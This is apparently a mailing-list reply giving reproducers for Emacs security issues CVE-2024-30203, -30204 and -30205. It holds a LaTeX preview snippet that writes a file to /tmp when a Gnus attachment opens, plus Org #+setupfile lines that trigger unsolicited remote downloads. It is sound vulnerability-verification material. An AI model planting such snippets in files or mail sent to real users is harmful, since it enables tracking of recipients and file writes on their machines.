Re: Reproducers for recent Emacs security issues

[Max Nikulin <manikulin@gmail.com>]

On 14/04/2024 10:23, Sean Whitton wrote:
> 
> I already have a sample Org file that I can use to test whether
> CVE-2024-30202 is fixed.  Would you happen to already have reproducers
> for the other two problems to hand?

LaTeX preview issue
===================

- CVE-2024-30203 In Emacs before 29.3, Gnus treats inline MIME contents 
as trusted.
- CVE-2024-30204 In Emacs before 29.3, LaTeX preview is enabled by 
default for e-mail attachments.

It requires fixes in Emacs code besides Org mode.

1. Install dvipng.
Alternatively you may install dvisvgm and add to your init file
     (setq org-preview-latex-default-process 'dvisvgm)

2. Send a mail message with an attachment having
     Content-Type: text/x-org
or
     Content-Type: text/org
depending on MUA configuration. By default you may get 
application/vnd.lotus-organizer for .org files due to /etc/mime.types

Attachment content:

---- 8< ----
#+startup: latexpreview
LaTeX:
\begin{equation}
\newwrite\testfile\openout\testfile=\jobname.poc
\write\testfile{PoC}
\closeout\testfile
A \to \textrm{/tmp/\jobname.poc}
\end{equation}

*Warning!* Change the math snippet before every test
or remove the cached image.
---- >8 ----

3. Open message.

LaTeX preview never worked in attachment inline preview.
Check that a file is created in /tmp/
     ls -l tmp/orgtex*.poc

The issue is not fixed for the scenario when an arbitrary text file is
opened in Emacs directly (e.g. a file downloaded from some web site).

Attempts to download remote content
===================================

CVE-2024-30205 In Emacs before 29.3, Org mode considers contents of
remote files to be trusted. This affects Org Mode before 9.6.23.

Actually there are 2 issues. They may be used to track that users
receive messages, so mail addresses are valid. In addition they allow to
download from a remote site payload for the LaTeX preview or code
execution exploits.

[BUG] Unsolicited download of remote resources.
Fri, 2 Feb 2024 23:57:54 +0700.
https://list.orgmode.org/upj6uk$b7o$1@ciao.gmane.io

--- 8< ---
#+setupfile: http://localhost:8000/setup-1234567890.org
--- >8 ---

[BUG] Org may fetch remote content without asking user consent.
Wed, 7 Feb 2024 17:54:07 +0700.
https://list.orgmode.org/upvngj$150v$1@ciao.gmane.io

Requires installed the gvfs-backends package
--- 8< ---
#+setupfile: /dav:localhost#8000:/msg-123456.org
--- >8 ---

Notice that the following commit is not mentioned in the CVE description.
https://git.savannah.gnu.org/cgit/emacs.git/commit/?id=e56f0ef51bf
2024-02-02 20:59:41 +0100 Ihor Radchenko: org: Fix security prompt for 
downloading remote resource

Backporting fixes to Emacs-28 requires more changes since the dialog to 
ask user if a file should be downloaded has been implemented in Org-9.6 
while Emacs-28 is shipped with Org-9.5.

Trying to reproduce, you may face the following issue:
[BUG] Partially broken Org mode when remote setupfile is unavailable.
Tue, 19 Mar 2024 17:46:46 +0700.
https://list.orgmode.org/utbqeo$bk3$1@ciao.gmane.io